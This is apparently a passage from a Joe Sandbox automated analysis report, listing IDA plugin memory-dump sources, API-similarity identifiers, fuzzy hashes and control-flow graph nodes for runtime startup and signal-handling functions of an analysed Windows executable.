                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcslen$memset$wcscpy$wcsncmp
                                                                                                                                                                                                                                      • String ID: 0$X$`
                                                                                                                                                                                                                                      • API String ID: 4021896446-2527496196
                                                                                                                                                                                                                                      • Opcode ID: 5dfd92650deef2131241ba9aa21a97c289f7b13a7489559770a67fde3b4408bd
                                                                                                                                                                                                                                      • Instruction ID: 171109fbe94dacbad58f2a6312dfa2712b407412d6a27b772f3bb73dfa9f0dc7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dfd92650deef2131241ba9aa21a97c289f7b13a7489559770a67fde3b4408bd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A127C62A18BC185E3718F25E5043AAB7A0FB95794F008365EE9C97BD9EF7CD184CB40

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 422 7ff69af11180-7ff69af111ae 423 7ff69af11480-7ff69af11483 GetStartupInfoW 422->423 424 7ff69af111b4-7ff69af111d1 422->424 428 7ff69af11490-7ff69af114aa call 7ff69af1b938 423->428 425 7ff69af111e4-7ff69af111ef 424->425 426 7ff69af111f1-7ff69af111ff 425->426 427 7ff69af111d3-7ff69af111d6 425->427 429 7ff69af11437-7ff69af11446 call 7ff69af1b928 426->429 430 7ff69af11205-7ff69af11209 426->430 432 7ff69af111dc-7ff69af111e1 Sleep 427->432 433 7ff69af11420-7ff69af11431 427->433 439 7ff69af1144c-7ff69af11467 _initterm 429->439 440 7ff69af11224-7ff69af11226 429->440 435 7ff69af1120f-7ff69af1121e 430->435 436 7ff69af114b0-7ff69af114c9 call 7ff69af1b948 430->436 432->425 433->429 433->430 435->439 435->440 447 7ff69af114ce-7ff69af114d0 call 7ff69af1b978 436->447 442 7ff69af1122c-7ff69af11239 439->442 443 7ff69af1146d-7ff69af11472 439->443 440->442 440->443 445 7ff69af11247-7ff69af1128f call 7ff69af156a0 SetUnhandledExceptionFilter call 7ff69af1b520 call 7ff69af15420 call 7ff69af1b4e0 442->445 446 7ff69af1123b-7ff69af11243 442->446 443->442 458 7ff69af112a6-7ff69af112ad 445->458 459 7ff69af11291 445->459 446->445 451 7ff69af114d5-7ff69af114d6 447->451 461 7ff69af112af-7ff69af112be 458->461 462 7ff69af11293-7ff69af11296 458->462 460 7ff69af112e7-7ff69af112ed 459->460 466 7ff69af11390-7ff69af1139a 460->466 467 7ff69af112f3-7ff69af11318 malloc 460->467 465 7ff69af112a2 461->465 463 7ff69af11298-7ff69af1129b 462->463 464 7ff69af112c0-7ff69af112c7 462->464 463->464 468 7ff69af1129d 463->468 471 7ff69af112c9 464->471 472 7ff69af112e0 464->472 465->458 469 7ff69af1139c 466->469 470 7ff69af113a1-7ff69af113a7 466->470 473 7ff69af1131e-7ff69af1132c 467->473 474 7ff69af113b5-7ff69af113e9 call 7ff69af15230 call 7ff69af11880 467->474 468->465 469->470 470->467 475 7ff69af112d0-7ff69af112de 471->475 472->460 477 7ff69af1132e 473->477 478 7ff69af11383-7ff69af11388 473->478 487 7ff69af113ee-7ff69af113fc 474->487 475->472 475->475 479 7ff69af11330-7ff69af11336 477->479 480 7ff69af11351-7ff69af11374 malloc memcpy 478->480 482 7ff69af11340-7ff69af1134b 479->482 483 7ff69af11376-7ff69af11381 480->483 484 7ff69af113b0 480->484 482->482 486 7ff69af1134d 482->486 483->478 483->479 484->474 486->480 487->447 488 7ff69af11402-7ff69af1140a 487->488 488->428 489 7ff69af11410-7ff69af1141f 488->489
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 772431862-0
                                                                                                                                                                                                                                      • Opcode ID: 8cb9c930c091871e2a32b8ca82a4e29d5b1292fd2592a546d7c2f9fc4b5aa782
                                                                                                                                                                                                                                      • Instruction ID: 6510b897a66fc9ffa565c56bf72e77d26424d7182098d48f1eb471c491180082
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cb9c930c091871e2a32b8ca82a4e29d5b1292fd2592a546d7c2f9fc4b5aa782
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D99154B2E0864A85FB309B16EA4477933E1EF49B94F8481F9CA0DC77A5DF2DA950C304

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$Free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2242701089-0
                                                                                                                                                                                                                                      • Opcode ID: 73d530ef449843e6409f0cc36623cc1827a3a45e5528ad8b59a677982093e437
                                                                                                                                                                                                                                      • Instruction ID: 4dae279c3f6175f757a8c99251bfaa4a02b8d04b021159dbbb295cd14940219d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73d530ef449843e6409f0cc36623cc1827a3a45e5528ad8b59a677982093e437
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31F09865E1854B96E630EB20EA554397761FB98394F8440F4D94D872B5DE2CEA05DB00

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3616488086-0
                                                                                                                                                                                                                                      • Opcode ID: b2d8096be2b83d84b0644b4fd8c5469c4767b560b69be31ccf18f20abda553e9
                                                                                                                                                                                                                                      • Instruction ID: 8a1e6249ae1991a105d07f73df1a373c2b5eb09a7af8120ed7a2968905c0e007
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2d8096be2b83d84b0644b4fd8c5469c4767b560b69be31ccf18f20abda553e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7021D3A2A1828595F6309F11A4047BBB6A0FBC57A4F8002B5EF9D87AD9DF7DE146C700

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcslen$wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3662116142-0
                                                                                                                                                                                                                                      • Opcode ID: 883472445985aba1a67f113e38a42d216cb9e88e05912989ae069315022e1a5c
                                                                                                                                                                                                                                      • Instruction ID: c134f9f63a8eb13ee5da347bc5710b61ab0b4dfbf5cefa226ac5eac7d02c84e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 883472445985aba1a67f113e38a42d216cb9e88e05912989ae069315022e1a5c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E001D6A2B1C68141E271EA12B8007FA7691EFCABD0F5442B5FE8E93B85CE3CD146C704

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 619 7ff69af15a66-7ff69af15a8b 620 7ff69af15be0-7ff69af15be4 619->620 621 7ff69af15a91-7ff69af15a96 619->621 620->621 622 7ff69af15bea 620->622 623 7ff69af15a98-7ff69af15a9d 621->623 624 7ff69af15af3-7ff69af15af8 621->624 625 7ff69af15b40 622->625 628 7ff69af15a9f-7ff69af15aa4 623->628 629 7ff69af15b12-7ff69af15b22 signal 623->629 626 7ff69af15afe 624->626 627 7ff69af15bb5-7ff69af15bc5 call 7ff69af1b9d0 624->627 636 7ff69af15b45-7ff69af15b4a 625->636 630 7ff69af15b50-7ff69af15b55 626->630 631 7ff69af15b00-7ff69af15b05 626->631 632 7ff69af15bc7-7ff69af15bca 627->632 650 7ff69af15c00-7ff69af15c14 signal 627->650 628->625 635 7ff69af15aaa 628->635 629->632 633 7ff69af15b28-7ff69af15b3c signal call 7ff69af15420 629->633 630->625 637 7ff69af15b57-7ff69af15b5c 630->637 631->625 638 7ff69af15b07-7ff69af15b0c 631->638 643 7ff69af15bcc-7ff69af15bd8 632->643 644 7ff69af15b9e-7ff69af15ba8 632->644 633->625 641 7ff69af15b90-7ff69af15b95 635->641 642 7ff69af15ab0-7ff69af15ab5 635->642 637->644 645 7ff69af15b5e-7ff69af15b6e signal 637->645 638->629 638->644 641->645 646 7ff69af15b97-7ff69af15b9c 641->646 642->625 651 7ff69af15abb-7ff69af15ac0 642->651 643->636 647 7ff69af15baa-7ff69af15bb1 644->647 648 7ff69af15bf0-7ff69af15bf7 644->648 654 7ff69af15c19-7ff69af15c2b signal 645->654 655 7ff69af15b74-7ff69af15b77 645->655 646->625 646->644 647->627 650->636 651->644 652 7ff69af15ac6-7ff69af15ad6 signal 651->652 656 7ff69af15adc-7ff69af15adf 652->656 657 7ff69af15c30-7ff69af15c42 signal 652->657 654->636 655->644 658 7ff69af15b79-7ff69af15b85 655->658 656->644 659 7ff69af15ae5-7ff69af15af1 656->659 657->636 658->636 659->636
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: signal
                                                                                                                                                                                                                                      • String ID: CCG
                                                                                                                                                                                                                                      • API String ID: 1946981877-1584390748
                                                                                                                                                                                                                                      • Opcode ID: 0c01f425e0de3a80f8f6df4b7973945bddacf8d6f645a1a3af4c393d19b37259
                                                                                                                                                                                                                                      • Instruction ID: 4c4f5c7bfa842ce533e29d2f8587c34d1c1fdd4d9a8bd13f573e8767b902dcc6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c01f425e0de3a80f8f6df4b7973945bddacf8d6f645a1a3af4c393d19b37259
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 314150E0E1C4064AFAB8967944E437872C2DF99334F6986F6D52EC73E2DD2CA8C54212
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                                                                                                      • Opcode ID: 208cc540c86ecf185aff6cedb089ae9e2c58689e94542be7b88ff173d2c09013
                                                                                                                                                                                                                                      • Instruction ID: 348d7fa5030bf5eb484d6496250e26443178c7783e7c907d085b24d46806468b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 208cc540c86ecf185aff6cedb089ae9e2c58689e94542be7b88ff173d2c09013
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CD1F2A1A1868699FBA1CB25E6083B977E0EF557C4F4480F5EA4C877A6EF3CE144C700
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 767a5258907ec4f12864d71057dd6e1fe1a67a83de83b5386605fb7f1dee2ead
                                                                                                                                                                                                                                      • Instruction ID: a80d8ccf2cb2f481d9fdcc17023b53a8e1adfe3c88b86cbdf2521d2712e3f9ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 767a5258907ec4f12864d71057dd6e1fe1a67a83de83b5386605fb7f1dee2ead
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BC2D6B2A1C6828BE771DF25A04077AB7E1FB85784F1081B5EA4A87B95DF3DE4418F40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e503ca6379582d288d94a70f38dda3bc98ca0c70a66edfc9791bf727c650d68e
                                                                                                                                                                                                                                      • Instruction ID: 5f210fc35c926b0cadc2f73f8591e19a563cd0377dbf86e0e434634825627246
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e503ca6379582d288d94a70f38dda3bc98ca0c70a66edfc9791bf727c650d68e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F0F48BD0EBC619F26305B40F252691F90EB579A4B5C42FBCB68C22E7DD0D6E059315
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                                                                                                                                                                      • Instruction ID: eed00bcefc1dc41991bfe796464762f629483bea3243fca70640af70a39b9b7a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7E0B6B6A08B85818614DB52F48005EBBA4F7D97C4B504916FECC57B19CF3CC1A08B80
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7cecf404510d40b0ebb1dd1b1368afb9df208dbfd33b8d4f7e94f1b7a0dc128a
                                                                                                                                                                                                                                      • Instruction ID: d72edb55074b76ca55bdabe567d77c122c1fe1eee7048fb5910d762db0bef034
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cecf404510d40b0ebb1dd1b1368afb9df208dbfd33b8d4f7e94f1b7a0dc128a
